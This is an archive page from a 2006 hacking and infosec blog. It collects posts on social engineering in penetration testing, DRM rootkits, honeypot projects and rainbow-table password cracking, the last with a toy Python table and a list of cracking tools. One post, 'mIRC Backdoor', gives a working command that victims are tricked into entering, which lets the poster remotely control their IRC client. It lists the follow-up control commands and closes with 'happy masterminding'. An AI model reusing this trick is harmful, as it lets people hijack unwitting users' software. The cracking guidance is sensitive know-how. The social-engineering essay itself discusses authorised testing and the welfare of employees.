Darknet - The Darkside

Don't Learn to HACK - Hack to LEARN. That's our motto and we stick to it; we are all about Ethical Hacking, Penetration Testing & Computer Security. We share and comment on interesting infosec related news, tools and more. Follow us on RSS or Twitter for the latest updates.

01 March 2006 | 17,203 views

Should Social Engineering be a part of Penetration Testing?


This is actually a very interesting debate.

Just a quick introduction, in case you don't know:

What is Penetration Testing

A penetration test is a method of evaluating the security of a computer system or network by simulating an attack by a malicious cracker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.


What is Social Engineering

It’s a bit cheesy, but we often call this hacking the wetware (hardware, software and wetware meaning people).

Social Engineering is a form of intrusion making use of weaknesses in the non-technical aspects of the system, the wetware, also known as people. The most familiar form of social engineering is the ‘con man’. In the technological realm, social engineering relates to unauthorized access to computing resources or networks by exploiting human weaknesses.

In the historical sense, con men would engineer their way into certain resources: someone’s bank account, the shoe box under the bed and so on. In this context the social engineer would target someone who is authorized to use the network or resource they wish to access, and attempt to leverage some confidential information out of them that would compromise the network security.

This is what Mitnick was famous for, and what his book The Art of Deception is about.

I’ll probably cover this more later.

Does Social Engineering have a place in Penetration Testing?

Some people say yes, it’s the most effective way. Actually I’ve found this to be true: the human element and the lack of education in the workplace is often the weakest link in the chain.

Does it have any place in security testing? I would say definitely yes. Some people would say perhaps it should be a separate project, not part of the ‘technical’ assessment of a security perimeter.

Of course it depends on the scope given by the client, but it should be part of any good Penetration Test or Vulnerability Assessment.

Why Social Engineering Should be in a Pen Test

For me, whatever you do to get into the network or escalate your access is part of a pen-test. If you are able to get users to divulge some kind of information that assists you in compromising or gaining access to something, then you are doing exactly what a real attacker would have been able to do. You might be able to trick them into telling you something via phone or e-mail, get them to physically do something like open a door or unlock a machine, or get them to run an executable or disable a firewall. You might be able to get them to do so under false pretenses, through their own ignorance or carelessness, or by other means. Whatever you do can be considered part of a pen-test.

Many recent studies have shown people are still incredibly gullible, and especially when presented with a ‘Free CD’ or something, they will happily put it in their drive and run it.

This means that in reality social engineering is an easy option for attacking a network: no IDS to worry about, no fear of being tracked by log analysis while attacking. Some attackers try to extract information about the network and internal devices by calling the IT staff and pretending to be a salesman who is trying to sell a log analyzer or IDS. The staff will often say “No, we don’t need a new Firewall, we already have a Cisco PIX”.

Why Social Engineering Shouldn’t be in a Pen Test

Some would say social engineering is altogether a different game; the pen testing results could be used to socially engineer someone within the company, making it perhaps an extension of the pen-test rather than a part of it.

The target of the pen-test might be in a physically different location (Makes the SE more difficult) or the native language of the target may be different (Makes the SE pretty much impossible).

Some people say don’t bother, because you WILL succeed with social engineering.

The main problem is that technical testing is fairly scientific: you can apply metrics to it, you can measure it and you can track its effectiveness.

With social engineering, it’s still pretty much an art form and differs totally from person to person; it’s very hard to be scientific when it comes to conning people. Social Engineering may well be left out by large corporations unless it can be scientifically defined and metrics applied to it.

Things to Keep in Mind

However, there are a few important things to keep in mind. You want to definitely lay down the ground rules with whomever it is you are pen-testing for. They might just want to see what machines an exploit can break into. You might really upset some people and get in trouble if you start trying to gain physical access or send trojans to executives. Make sure they are aware of what you are doing and that you have approval. Get everything in writing or in your agreement somewhere.

Also there are many questions to be answered before doing an SE test – questions of legality, ethics and possible personal consequences for the people who were “duped”. These have to be taken into consideration and could mean the social engineering part is not possible.

Please bear in mind the welfare of the employees too, and consider adding a clause that protects the end-user from getting fired. Human nature is to be helpful; the problem is a lack of education, not a mistake by the user.


You can include Social Engineering or not based on the above information. If you don’t include it, you can always demonstrate it for information purposes to the management team or contact at the target organisation.

References: Discussion on SF Pen Test List

01 March 2006 | 8,420 views

Prostitutes want GTA (Grand Theft Auto) Banned

A little bit crazy eh?

Sex workers cry foul, say game “accrues points to players for the depiction of rape and murder of prostitutes.”

The Grand Theft Auto franchise is getting attacked from all angles. Joining the ranks of politicians, policemen, and attorneys in their crusade to see the game lifted from shelves are the nation’s sex workers. On its Web site, the Sex Workers Outreach Project USA is asking parents to assist them in calling for a ban of Take-Two Interactive’s controversial game.

Citing a 2001 document from the National Institute on Media and the Family’s David Walsh, SWOP is calling “on all parents and all gamers to boycott Grand Theft Auto.”

The organization quotes various points from Walsh’s paper, including, “Children are more likely to imitate a character with whom they identify with. In violent video games the player is often required to take the point of view of the shooter or perpetrator.”

Source: Gamespot

Apparently, the sex workers of the Sex Workers Outreach Project aren’t too happy about their in-game counterparts being treated violently in the GTA games. They note that the games are a bad influence on children, and might encourage rape and violent behavior towards prostitutes in real life.

SWOP Statement on Grand Theft Auto
The game Grand Theft Auto demonstrates attitudes and behaviors that reflect broader social attitudes toward prostitutes, who are made vulnerable because of their criminal status. Our outrage and disgust at the depictions of prostitutes in games such as GTA renew our call for absolute de-criminalization and repeal of all laws that outlaw the exchange of sex for money in order to end the violence directed at people believed to be prostitutes.

It’s a bit ridiculous if you ask me, are Soldiers going to start suing me because I enjoy blowing them up in Castle Wolfenstein?

Or Special Forces operatives…they will start suing Tom Clancy, omg Rainbow 6, YOU TRAUMATISED ME!?!

01 March 2006 | 7,162 views

Who is Navaho Gunleg?

Following the recent post by backbone, I decided to post a short introduction as well.

I am from The Netherlands, Europe, a country most people probably have heard about, either because of the legendary HackTic foundation that later started the ISP XS4ALL, or otherwise undoubtedly because of our liberal stance towards soft drugs and prostitution.

I have always been drawn to computers and remember tinkering with them ever since my parents bought one, a Commodore 64. At that time, we didn’t have that much money to spend so I was forced to write my own programs and games. This experience basically laid the basis for my profession as a programmer, later in life.

As time passed, other computers came into our household, mainly because of my dad’s job. Things started getting really interesting on the PC: MSDOS, PCDOS, various programming languages such as BASIC and Pascal, applications such as DBASE.

In contrast to people who only have experience with graphical user interfaces such as Microsoft’s and Apple’s, because of my experience with the command line, UNIX-flavoured operating systems don’t scare me.

In the Present
Currently, I am a programmer for a media company. The operating systems I work on are all UNIX-flavours. I can ‘speak’ most relevant (programming) languages available on those machines: C(++), Shell scripting, PHP, Javascript, SQL and HTML to name but a few. I have had the privilege to tinker with J2ME (that’s Java for mobile devices such as phones) as well.

I mainly implement the technology behind web-sites, such as content-management systems and various types of server-to-server communication. Additionally, I write plugins for interactive voice response systems such as Bayonne.

Additionally, I also do system administration on a few of those servers, so I have grown quite interested in server security as well.

In my spare time, because I’m cheap, I still write my own software. If I’m out of suggestions, my girlfriend sometimes has a request for something. For the last couple of years I have loved to make everything web-based. This fuelled my interest in web-based user interfaces and the technology behind them: databases, scripting and secure communications.

Being a coder, my articles will mainly focus on programming: how to, and how not to, implement stuff safely and securely. Fact is, programs that rely on end-user input are by definition unsafe.

Knowing the business side of the chain, so to speak, I have come to discover that a lot of companies, simply because of a lack of knowledge, money or time, fail to implement online systems securely enough.

Technology is going faster than most people can keep track of it and this has implications that some people might ignore.

28 February 2006 | 44,914 views

US considers banning DRM rootkits – Sony BMG

Now after the huge Sony BMG Rootkit fiasco, this has become quite a hot topic, how far can vendors go to enforce their ‘Digital Rights Management’ (or Digital Restrictions Management as we like to call it), can they install a rootkit on your machine and hook into your OS? Can they take over your PC just so they can check you aren’t pirating their music?

Thankfully the US government has taken this matter into consideration and is considering banning DRM rootkits.

US government officials are considering introducing legislation if companies continue to distribute copy-protection measures that compromise computer security.

The Department of Homeland Security’s Border and Transportation Security Directorate warning followed the discovery last year that Sony BMG employed two different types of digital rights management (DRM) on music CDs sold in the US, and both installed rootkit software on PCs that made them vulnerable.

The Sony Case did indeed cause a massive storm and raised quite a large anti-Sony sentiment.

Sony has begun compensating customers who inadvertently installed the rootkit by inserting the affected CDs into PCs. However, the swathes of bad publicity that it received over the whole affair have not deterred others. F-Secure reports that the German DVD of the Mr & Mrs Smith movie starring Brad Pitt and Angelina Jolie contains the Settec Alpha-DISC system that installs a user-mode rootkit.

I’m glad the government are taking this seriously.

It does show, however, how weak the security architecture is on Windows by default. How many Linux users do you see inserting random CDs as root?

Source: PC Pro


27 February 2006 | 409,576 views

Password Cracking with Rainbowcrack and Rainbow Tables

What is RainbowCrack & Rainbow Tables?

RainbowCrack is a general purpose implementation of Philippe Oechslin’s faster time-memory trade-off technique.

In 1980 Martin Hellman described a cryptanalytic time-memory trade-off which reduces the time of cryptanalysis by using precalculated data stored in memory. This technique was improved by Rivest before 1982 with the introduction of distinguished points which drastically reduces the number of memory lookups during cryptanalysis. This improved technique has been studied extensively but no new optimisations have been published ever since.

You can find the official Rainbowcrack project here, where you can download the latest version of Rainbowcrack.

In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker tries all possible plaintexts one by one at cracking time. It is time consuming to break a complex password in this way. The idea of the time-memory trade-off is to do all the cracking-time computation in advance and store the result in files, the so-called “rainbow tables”.

Basically these types of password crackers work with pre-calculated hashes of ALL passwords available within a certain character space, be that a-z or a-zA-Z or a-zA-Z0-9 etc.

These files are called Rainbow Tables.

You are trading memory and disk space for speed; the Rainbow Tables can be VERY large.

Be warned though: Rainbow tables can be defeated by salted hashes. If the hashes are not salted, however, and you have the correct table, a complex password can be cracked in a few minutes rather than a few weeks or months with traditional brute forcing techniques.
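To make the trade-off concrete, here is a toy rainbow table in Python, added as an illustration and not part of RainbowCrack or the original post. It assumes a constructed 64-password key space (3 characters over "abcd"), MD5 as the unsalted hash, and 8-link chains; only chain endpoints are stored, a lookup walks the chain backwards from each column, and a per-user salt shows why the table then misses.

```python
import hashlib
import random

# Constructed toy key space: 3-character passwords over "abcd" (64 in total).
# Real tables cover spaces like a-zA-Z0-9 with chains thousands of links long.
ALPHABET = "abcd"
LENGTH = 3
SPACE = len(ALPHABET) ** LENGTH
CHAIN_LEN = 8   # links per chain; only the two ends of each chain are stored

def h(pw: str) -> bytes:
    """Unsalted hash the table is built for (MD5 as a stand-in)."""
    return hashlib.md5(pw.encode()).digest()

def index_to_pw(n: int) -> str:
    """Map an integer in [0, SPACE) to a password in the key space."""
    out = ""
    for _ in range(LENGTH):
        out += ALPHABET[n % len(ALPHABET)]
        n //= len(ALPHABET)
    return out

def reduce_fn(digest: bytes, col: int) -> str:
    """Reduction R_col: digest -> password. Mixing in the column index is
    Oechslin's rainbow twist; Hellman's tables used one fixed reduction."""
    return index_to_pw((int.from_bytes(digest[:8], "big") + col) % SPACE)

def build_table(num_chains: int, seed: int = 1) -> dict:
    """Precompute chains; keep only (endpoint -> start point) pairs."""
    rng = random.Random(seed)
    table = {}
    for _ in range(num_chains):
        start = index_to_pw(rng.randrange(SPACE))
        pw = start
        for col in range(CHAIN_LEN):
            pw = reduce_fn(h(pw), col)
        table.setdefault(pw, start)   # merged chains keep the first start
    return table

def lookup(table: dict, target: bytes):
    """Return the password behind `target`, or None if the table misses it."""
    for col in range(CHAIN_LEN - 1, -1, -1):
        # Guess that `target` sits at column `col`; walk to the chain's end.
        pw = reduce_fn(target, col)
        for c in range(col + 1, CHAIN_LEN):
            pw = reduce_fn(h(pw), c)
        if pw in table:
            # Endpoint known: regenerate that chain and test each link.
            cand = table[pw]
            for c in range(CHAIN_LEN):
                if h(cand) == target:
                    return cand
                cand = reduce_fn(h(cand), c)   # false alarm: keep searching
    return None

def crack_all(table: dict) -> dict:
    """Attack every password in the space; returns {password: recovered}."""
    hits = {}
    for i in range(SPACE):
        pw = index_to_pw(i)
        found = lookup(table, h(pw))
        if found is not None:
            hits[pw] = found
    return hits

def salted_lookup(table: dict, pw: str, salt: str):
    """A per-user salt moves the stored hash outside the precomputed space."""
    return lookup(table, h(salt + pw))
```

With 40 chains the table stores at most 40 endpoint pairs yet recovers a good share of the 64 passwords; the salted lookup always returns None because no 3-character candidate can hash to the salted value.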

So where do I get these Rainbow Tables?

You can generate them yourself with RainbowCrack; this will take a long time and a lot of disk space.

Project Shmoo is offering downloads of popular Rainbow Tables via BitTorrent.


If you wanted to, you could even buy the tables from http://www.rainbowtables.net/.

Or from these guys, not free but cheap: http://www.rainbowcrack-online.com/

Some free tables here: http://wired.s6n.com/files/jathias/index.html

What software is available for use with Rainbow Tables?

There is of course the original RainbowCrack as mentioned above.

Then there is:

Ophcrack

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance.

Cain and Abel (newly added support for Rainbow Tables)

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Cain and Abel is personally my favourite fully featured password whacking tool. It also has a good packet sniffer, which grabs and decodes passwords, and many methods for password cracking. The interface is decent too. I’ll write more on how to get the most out of Cain later.

L0phtcrack or LC5

LC5 is the latest version of L0phtCrack, the award-winning password auditing and recovery application used by thousands of companies worldwide.

Please note this is a COMMERCIAL product.

Thankfully there is a freeware alternative to LC5 in the form of LCP.

The main purpose of the LCP program is user account password auditing and recovery in Windows NT/2000/XP/2003.


27 February 2006 | 7,564 views

Malware Honeypot Projects Merge – mwcollect and nepenthes

Looking to streamline the collection of malware samples, two of the biggest honeypot projects mwcollect and nepenthes have merged operations.

The two projects, which passively trap viruses, spyware and other forms of malicious software by emulating known vulnerabilities, will combine operations to develop a single malware collection tool, according to an announcement by mwcollect head developer Georg Wicherski.

The merger comes after a year of concurrent development that caused a lot of overlap and shared work, Wicherski said.

“Mwcollect.org will become a top-level community covering malware collection efforts, [and] nepenthes will become the official software used for malware collection and be part of mwcollect.org,” he said.

A new mwcollect.org meta-portal will be created to host information related to malware collection.

Source: Eweek

26 February 2006 | 5,556 views

Firefox Confuses UK Government Piracy Laws

The UK government stated:

If Mozilla permit the sale of copied versions of its software, it makes it virtually impossible for us, from a practical point of view, to enforce UK anti-piracy legislation

It seems they really don’t understand the whole open source thing, do they? You can’t pirate open source software; you can, however, sell it however you like. Most companies just charge a nominal fee to cover the cost of the CD and the postage.

I can’t believe that your company would allow people to make money from something that you allow people to have free access to. Is this really the case?

The contact from Mozilla licensing actually responded, attempting to explain the situation.

I wrote back, politely explaining the principles of copyleft & that the software was free, both as in speech and as in price, and that people copying and redistributing it was a feature, not a bug. I said that selling verbatim copies of Firefox on physical media was absolutely fine with us, and we would like her to return any confiscated CDs and allow us to continue with our plan for world domination (or words to that effect).

Source: Slashdot, Times Online

25 February 2006 | 10,735 views

Free Prep Material for LPI Linux Certification (LPI 201 and 202)

Here’s a series of well written IBM Linux tutorials to help you learn Linux fundamentals and prepare for system administrator certification. The LPI prep tutorials help you prepare for the topics in LPI exam 201 and the topics in LPI exam 202.

You can find more about the certification at the Linux Professional Institute.

I’ve been meaning to take LPI 201 for quite some time actually. It looks like a pretty solid foundation in Linux and I know most of it already, so I should be able to do it without too much of a problem.

You can find the material at IBM:

Linux Professional Institute Exam Prep

The eight tutorials below help you prepare for the eight topics in LPI exam 201. Exam 201 is the first of two LPI intermediate-level system administrator exams. Both exam 201 and exam 202 are required for intermediate-level certification, or LPIC-2.

You do have to sign up, or just use Bugmenot, the bugmenot extension for Firefox is very useful ;)

To any budding hackers, yes it is recommended you have strong Linux skills.

24 February 2006 | 22,646 views

mIRC Backdoor

Well it’s not really a backdoor… but we can consider it one…

Some time ago an article about a backdoor in mIRC appeared on many websites (including mine)… all this backdoor stuff was really nothing more than a mIRC script that made the client respond to any command received via CTCP (Client To Client Protocol), such as ping, version, time, etc… so here is the command that the victim has to enter:

//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

The command is split into 2 parts, delimited by | (a vertical line)… The first section writes a file “mirc.dll” into which we write a simple mIRC script that listens to any CTCP request… the second one loads the file with the mIRC script….

After the “victim” executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

/ctcp victims_nick /.any_valid_irc_command

So happy “masterminding”….

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php

24 February 2006 | 6,892 views

UK Wants Backdoor in Next Version of Microsoft Windows

Yes, that’s right: big brother wants a backdoor in your operating system. Even MORE of a reason to use Open Source alternatives that we can audit ourselves, eh?

There has been talk of such things in the past, US government backdoors in common cryptography algorithms, and now there is talk of backdoors in the most popular OS in the world.

Windows Vista is due to be rolled out later this year. Cambridge academic Ross Anderson told MPs it would mean more computer files being encrypted.

He urged the government to look at establishing “back door” ways of getting around encryptions.

The Home Office later told the BBC News website it is in talks with Microsoft.

Yes, it bothers me.

Professor Anderson said people were discussing the idea of making computer vendors ensure “back door keys” to encrypted material were made available.

The Home Office should enter talks with Microsoft now rather than when the system is introduced, he said.

He said encryption tools generally were either good or useless.

“If they are good, you either guess the password or give up,” he said.

Source: BBC News